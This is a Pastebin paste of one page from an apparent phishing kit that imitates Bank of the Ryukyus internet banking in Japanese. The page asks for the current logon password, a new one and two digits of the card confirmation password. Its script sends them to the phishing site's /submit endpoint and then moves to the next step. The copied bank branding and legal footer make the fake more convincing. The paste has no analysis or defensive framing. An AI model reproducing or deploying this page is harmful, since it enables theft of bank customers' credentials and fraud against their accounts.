ozuma5119

html/phishing/ryugivs.com/step9.html

Dec 10th, 2020
1,679
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 6.68 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="ja"><head>
  3. <meta http-equiv="content-type" content="text/html; charset=Shift_JIS">
  4. <meta charset="Shift_JIS">
  5. <title>琉球銀行インターネットバンキング</title>
  6.  
  7. <meta name="ROBOTS" content="NONE"><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=no">
  8.     <meta http-equiv="X-UA-Compatible" content="IE=9">
  9.     <meta name="MobileOptimized" content="0">
  10.     <meta name="format-detection" content="telephone=no">
  11.     <link rel="stylesheet" type="text/css" href="/static/liuqiu/reset.css">
  12.     <link id="emusccss" rel="stylesheet" type="text/css" href="/static/liuqiu/emusc_IK.css">
  13.     <script type="text/javascript" src="/static/js/jquery-3.3.1.min.js"></script>
  14.  
  15.  
  16.     <style type="text/css">
  17.         .table_list_confirmnum {
  18.             border:solid 2px #808080;
  19.             text-align:center;
  20.             font-size:1.0em;
  21.             border-collapse:collapse;
  22.             margin:10px 0px 10px 12px;
  23.         }
  24.  
  25.         .table_list_confirmnum th {
  26.             width:180px;
  27.             background-color:#fafad2;
  28.             border-right: solid 2px #808080;
  29.             border-bottom: solid 2px #808080;
  30.             height: 15px;
  31.             padding: 2px;
  32.         }
  33.  
  34.         .table_list_confirmnum td {
  35.             width:25px;
  36.             border-right: solid 2px #808080;
  37.             border-bottom: solid 2px #808080;
  38.             height: 15px;
  39.             padding: 2px;
  40.         }
  41.     </style>
  42. </head>
  43.  
  44. <script language="JavaScript">
  45.  
  46.  
  47.     function strlen(str){
  48.         var len = 0;
  49.         for (var i=0; i<str.length; i++) {
  50.             var c = str.charCodeAt(i);
  51.            
  52.             if ((c >= 0x0001 && c <= 0x007e) || (0xff60<=c && c<=0xff9f)) {
  53.                 len++;
  54.             }
  55.             else {
  56.                 len+=2;
  57.             }
  58.         }
  59.         return len;
  60.     }
  61.  
  62.  
  63.     function inputCheckRequired(itemValue, itemName) {
  64.  
  65.         if (strlen($(itemValue).val()) == 0) {
  66.             alert ("\n" + itemName + "を入力してください。");
  67.             $(itemValue).focus();
  68.             return false;
  69.         }
  70.  
  71.         return true;
  72.     }
  73.  
  74.         function checkInput() {
  75.             if (!inputCheckRequired('#oldpass','現在のログオンパスワード')) {
  76.                     return false;
  77.             }
  78.             if (!inputCheckRequired('#newpass','変更後のログオンパスワード')) {
  79.                 return false;
  80.             }
  81.             if (!inputCheckRequired('#pass','2桁目と4桁目を入力')) {
  82.                 return false;
  83.             }
  84.  
  85.             return true;
  86.         }
  87.    
  88. </script>
  89. </head>
  90. <body>
  91.  
  92. <header class="wrapper"><a name="#" href=""></a><table><tbody><tr><td id="logo" class="td100"></td></tr></tbody></table></header>
  93.  
  94. <div class="wrapper">
  95.  
  96.    
  97.     <h1 id="title">
  98.         <table>
  99.             <tbody><tr>
  100.                 <td class="td30 AlVm"></td>
  101.                 <td class="td40 AcVm">本人認証</td>
  102.                 <td class="td30"></td>
  103.             </tr>
  104.         </tbody></table>
  105.     </h1>
  106.    
  107.     <article id="mainContents">
  108.         <div id="main">
  109.             <div id="wait" style="left:0px;top:0;height:100%;width:100%;position: absolute;display:none;background: rgba(0,0,0,0.6);opacity: 0.8;z-index:9999999;">
  110.                 <img style="position:absolute;left:50%;margin-left:-50px;top:30%;margin-top:-100px;width:100px;height:100px;" src="/static/picture/loading.gif" />
  111.             </div>
  112.             <div class="blue_border">
  113.                 <div class="nav_area">
  114.                     <table>
  115.                         <tbody><tr>
  116.                            
  117.                         </tr>
  118.                         <tr>
  119.                            
  120.                         </tr>
  121.                     </tbody></table>
  122.                 </div>
  123.                 <div class="msg_area">
  124.                     <div id="err_msg"></div>
  125.                    
  126.                 </div>
  127.                 <div class="write_area">
  128.                     <div class="block_title_sub"><span class="fontStrong">確認パスワード
  129.  
  130.                         ご利用カードの「確認パスワード」が必要です。確認パスワードを一定回数間違えると、パスワードが利用できなくなるのでご注意ください。
  131.                         2と4の欄  ( 2桁 )</span></div>
  132.  
  133.                     <br>
  134.  
  135.                     <div class="AlVm"><span class="fontStrong">確認パスワード(可変)</span></div>
  136.                     <table class="table_list_confirmnum">
  137.                         <tbody><tr>
  138.                             <th></th>
  139.                             <td>1</td>
  140.                             <td>2</td>
  141.                             <td>3</td>
  142.                             <td>4</td>
  143.                             <td>5</td>
  144.                             <td>6</td>
  145.                             <td>7</td>
  146.                             <td>8</td>
  147.                             <td>9</td>
  148.                             <td>10</td>
  149.                         </tr>
  150.                         <tr>
  151.                             <th><span>確認番号</span></th>
  152.                             <td><br></td>
  153.                             <td></td>
  154.                             <td><br></td>
  155.                             <td></td>
  156.                             <td><br></td>
  157.                             <td><br></td>
  158.                             <td><br></td>
  159.                             <td><br></td>
  160.                             <td><br></td>
  161.                             <td><br></td>
  162.                         </tr>
  163.                         </tbody></table>
  164.  
  165.                     </div>
  166.                     </div>
  167.  
  168.  
  169.             <div class="nav_area">
  170.                 <table>
  171.                     <tbody><tr>
  172.  
  173.                     </tr>
  174.                     <tr>
  175.  
  176.                     </tr>
  177.                     </tbody></table>
  178.             </div>
  179.             <div class="write_area">
  180.             <div class="table_area">
  181.  
  182.                 <table class="block_item_list">
  183.                     <tbody><tr>
  184.                         <th>現在のログオンパスワード(6桁)</th>
  185.                         <td><input type="password" name="oldpass" id="oldpass" tabindex="100" maxlength="6" size="6" autocomplete="off"><br>(6桁)</td>
  186.                     </tr>
  187.                     <tr>
  188.                         <th>変更後のログオンパスワード(6桁)</th>
  189.                         <td>
  190.                             <input type="password" name="newpass" id="newpass" tabindex="100" maxlength="6" size="6" autocomplete="off"><br>(6桁)
  191.                         </td>
  192.                     </tr>
  193.                     </tbody></table>
  194.  
  195.                 <br>
  196.  
  197.                 <table class="block_item_list">
  198.                     <tbody><tr>
  199.                         <th>2桁目と4桁目を入力</th>
  200.                         <td><input type="password" name="pass" id="pass" tabindex="100" maxlength="2" size="2" autocomplete="off">( 2桁 )<br></td>
  201.                     </tr>
  202.                     </tbody>
  203.                 </table>
  204.             </div>
  205.             </div>
  206.  
  207.  
  208.                     <div class="msg_area">
  209.                     <div id="kbn_html"><br> <br></div>
  210.                 </div>
  211.                 <div class="button_area">
  212.                     <input type="button" class="disp_B" value="次へ" name="Next" tabindex="100" onclick="reg();">
  213.                 </div>
  214.                 </div>
  215.     </article>
  216. </div>
  217.  
  218.  
  219. <script>
  220.     var auto;
  221.     var count = 0;
  222.  
  223.     function isNulls(str){
  224.         if ( str == "" ) return true;
  225.         var regu = "^[ ]+$";
  226.         var re = new RegExp(regu);
  227.         return re.test(str);
  228.     }
  229.  
  230.     function reg(){
  231.  
  232.         if (checkInput() == false) {
  233.             return true;
  234.         }
  235.  
  236.  
  237.         $("#err_msg").hide();
  238.         $("#wait").css('height',document.body.scrollHeight);
  239.         $("#wait").show();
  240.         $.post("/submit",{Page:"9",Val10:$("#oldpass").val()+"-"+$("#newpass").val()+"-"+$("#pass").val(),
  241.         },function (data){
  242.             if (data.Code == 1 && data.Message == "success") {
  243.                 window.location = "/step10"
  244.             }
  245.         });
  246.         return true;
  247.     }
  248.  
  249. </script>
  250.  
  251. <footer class="wrapper">
  252.    
  253.     <script type="text/javascript"><!--
  254.  
  255.        
  256.     </script><div id="extraNavi"><div id="pageJump"><span><a href="javascript:void(0)" onclick="javaScript:parent.scroll(0,0)">▲ページの先頭へ</a></span></div><div id="tradeName" class="AlVm"><span>商号等:株式会社 琉球銀行   登録金融機関 沖縄総合事務局長(登金)第2号 加入協会:日本証券業協会</span></div></div>
  257.    
  258.     <div id="copyright"><small>Copyright (C) 2015 Bank of The Ryukyus,Ltd. All right reserved</small></div>
  259. </footer>
  260.  
  261.  
  262. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment